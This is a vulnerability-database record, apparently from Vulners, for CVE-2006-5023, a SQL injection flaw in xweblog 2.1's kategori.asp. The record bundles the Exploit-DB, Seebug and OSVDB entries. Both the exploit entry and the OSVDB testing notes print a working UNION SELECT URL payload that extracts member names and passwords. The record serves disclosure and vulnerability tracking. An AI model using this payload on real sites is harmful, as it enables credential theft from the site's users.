xweblog <= 2.1 kategori.asp Remote SQL Injection Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:2416", "cvelist": ["CVE-2006-5023"], "modified": "2006-09-22T00:00:00", "lastseen": "2016-01-31T16:12:41", "edition": 1, "sourceData": "# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability\n\n# Author : Muhacir\n\n# Source : http://www.aspindir.com/goster/4386\n\n# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler\n\n# Greetz To : str0ke :)\n\n# milw0rm.com [2006-09-22]\n", "published": "2006-09-22T00:00:00", "href": "https://www.exploit-db.com/exploits/2416/", "osvdbidlist": ["29103"], "reporter": "Muhacir", "hash": "40987e5a18bd2cae2e5dc0a7425129f3d3bd2c13070d1759c6c5c5ba9e1871c9", "title": "xweblog <= 2.1 kategori.asp Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability. CVE-2006-5023. Webapps exploit for asp platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2416/", "enchantments": {"vulnersScore": 3.5}}

{"result": {"cve": [{"id": "CVE-2006-5023", "type": "cve", "title": "CVE-2006-5023", "description": "SQL injection vulnerability in kategori.asp in xweblog 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the kategori parameter.", "published": "2006-09-27T19:07:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5023", "cvelist": ["CVE-2006-5023"], "lastseen": "2016-09-03T07:37:30"}], "seebug": [{"id": "SSV-64013", "type": "seebug", "title": "xweblog <= 2.1 (kategori. asp) Remote SQL Injection Vulnerability", "description": "Summary: \nxweblog of kategori. asp in the presence of the SQL injection vulnerability, a remote attacker can via the kategori parameter to execute arbitrary SQL commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-64013", "cvelist": ["CVE-2006-5023"], "lastseen": "2016-07-26T16:58:42"}], "osvdb": [{"id": "OSVDB:29103", "type": "osvdb", "title": "xweblog kategori.asp kategori Variable SQL Injection", "description": "## Manual Testing Notes\nhttp://[target]/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler\n## References:\nVendor URL: http://www.aspindir.com/goster/4386\n[Secunia Advisory ID:22052](https://secuniaresearch.flexerasoftware.com/advisories/22052/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2416\nFrSIRT Advisory: ADV-2006-3762\n[CVE-2006-5023](https://vulners.com/cve/CVE-2006-5023)\nBugtraq ID: 20145\n", "published": "2006-09-22T04:37:01", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29103", "cvelist": ["CVE-2006-5023"], "lastseen": "2017-04-28T13:20:25"}]}}